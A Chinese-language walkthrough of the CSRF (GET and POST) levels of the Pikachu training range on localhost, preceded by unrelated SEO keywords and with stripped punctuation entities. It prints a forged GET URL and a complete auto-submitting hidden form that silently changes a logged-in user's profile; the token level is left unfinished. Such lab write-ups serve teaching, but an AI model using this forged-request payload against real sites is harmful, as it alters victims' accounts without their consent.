php做网站需要的技术,wordpress 标签云插件下载,免费的短视频推荐app,宁波建设信息港网站csrf#xff08;get#xff09;
打开pikachu靶场#xff1a;
1. 根据提示给的账户密码进行登录 2. 打开代理拦截数据包将拦截数据发送到已打开的burp中#xff1a; 修改数据进行发包#xff1a; 从上面的url可见#xff0c;修改用户信息的时候#xff0c;是不带任何不…csrfget
打开pikachu靶场
1. 根据提示给的账户密码进行登录 2. 打开代理拦截数据包将拦截数据发送到已打开的burp中 修改数据进行发包 从上面的url可见修改用户信息的时候是不带任何不可预测的认证信息的。那么这里应该是可以被利用的。
回到把常中利用这个信息进行修改账户信息。
3. 在URL地址中构造payload 127.0.0.1/pikachu-master/vul/csrf/csrfget/csrf_get_edit.php?sexboyphonenum888888addusaemail11111submitsubmit 4. 攻击成功 csrfpost
1. 登录账户 2. 修改信息拦截 从上图的请求报文来看和前一关一样没有不可预测的认证信息可以被利用。
修改包中信息是可以被修改的但是这一关是post类型URL不再显示修改参数所以无法再使用上述办法即通过URL来伪造请求进行修改。 3. 构造攻击表单
此时可以构造一个表单。将POST请求隐藏在站点中的表单中然后诱骗用户进行点击当用户点击后触发表单数据自然就POST到存在CSRF漏洞的网站用户的信息则被恶意修改。
htmlscript window.onload function() {document.getElementById(submit).click();}/script bodyform actionhttp://127.0.0.1/pikachu-master/vul/csrf/csrfpost/csrf_post_edit.php methodPOST input typehidden namesex valueboy /input typehidden namephonenum value123456789 /input typehidden nameadd valueusa /input typehidden nameemail valuellll /input typehidden namesubmit valuesubmit /input idsubmit typesubmit valueSubmit request styledisplay:none/ !-- style设置为display:none起到隐藏submit按钮的作用 --/form/body
/html
我将构造的表单放到pikachu目录下当访问这个文件时就触发条件自动修改用户信息。
点击之前 点击文件之后
4. 攻击成功 csrftoken
让我攻略会~